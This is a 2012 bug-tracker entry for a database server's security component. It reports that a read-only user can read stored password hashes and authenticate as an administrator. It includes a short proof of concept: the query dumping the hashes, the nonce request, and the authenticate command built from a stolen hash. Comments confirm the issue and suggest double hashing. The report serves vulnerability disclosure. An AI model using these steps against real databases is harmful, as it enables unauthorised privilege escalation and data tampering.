[SERVER-6031] read only user can get write priority Created: 07/Jun/12  Updated: 15/Aug/12  Resolved: 12/Jun/12

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: None
Fix Version/s: None

Type: Bug Priority: Critical - P2
Reporter: xie zhenye Assignee: Unassigned
Resolution: Duplicate Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

all


Issue Links:
Related
is related to SERVER-4692 Read-only users should be denied acce... Closed
Operating System: ALL
Participants:

Description

A read-only user can get write privileges by accessing other users' pwd hashes.

sample:

> db.system.users.find()
{ "_id" : ObjectId("4fd068ae34ae311cd063f9b2"), "user" : "sa", "readOnly" : false, "pwd" : "84c689ded211fb631fd5f5dedc5d4539" }
{ "_id" : ObjectId("4fd07496cf5f726c2428ac3a"), "user" : "ro", "readOnly" : true, "pwd" : "d8883d4475561e209dda05a54a98c8f6" }

> db.$cmd.findOne({getnonce:1})
{ "nonce" : "9892be9572e9851e", "ok" : 1 }

> db.runCommand({ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
{ "ok" : 1 }

Comments
Comment by Eliot Horowitz (Inactive) [ 12/Jun/12 ]

SERVER-4692 should fix this issue.

Comment by Spencer Brody (Inactive) [ 07/Jun/12 ]

Confirmed and reproduced.

Comment by xie zhenye [ 07/Jun/12 ]

The authentication protocol only hashes the password once. It needs to hash twice to be more secure, like sha1(sha1(user+salt+password)), and the client should send sha1(user+salt+password) to do the authentication.

Generated at Thu Feb 08 03:10:34 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.